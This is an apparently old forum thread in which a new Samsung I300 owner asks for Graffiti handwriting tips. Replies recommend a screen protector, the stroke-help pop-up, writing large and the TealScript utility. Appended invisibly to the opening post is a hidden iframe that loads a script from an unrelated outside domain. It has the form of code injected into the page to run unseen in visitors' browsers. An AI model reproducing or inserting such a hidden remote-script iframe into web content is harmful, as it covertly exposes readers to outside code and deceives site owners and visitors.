Graffitti Tips

Hey I just picked up my new I300 today. It's a pretty cool machine and it's my forst color palm. I have one of the old Sony Clie for about 2 years not, but I just lost the the charger to it on a trip. So I decided to get the Samgung since I already had a sprint phone and a acount for the past 3 years. The only thing about these palms is that I was never really good with graffiti. Is there any good tips or hints anybody out there can give someone who's just starting out?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Run a search for screen cover or protector. Recognition is greatly enhanced with the film added to the screen. It also feels a bit more solid when writing.

A quick way to find he stroke for a number/letter/etc is to drag from (near) the bottom of the graffitti area to (near) the top of the palm window. This will pop-up a window showing the characters and the stroke to get them

I noticed mine was a little finicky getting the window to popup - don't go from the absolute bottom of the screen to the absolute top. The top of the screen contains phone-related icons which I think throws off recognizing what you're trying to do.

Also, if you do this and something else other than grafiti help appears, go to Preferences and select the Buttons group. Click the Pen button at the bottom to indicate you want the grafiti help to appear.

eman-

WRITE BIG!! It really helps recognition to make your strokes almost as large as the graffiti area.

The "V" is easier if you draw it backwards - from upper right - down - then upper left.

Practice makes perfect, too. Course, I'm an architect and I print block letters all the time anyway!

You might check out TealScript http://www.tealpoint.com/softscrp.htm . I tried it on my old Palm IIIc and it allows you to customize graffiti strokes to your liking. I have NOT tested it on the I300.
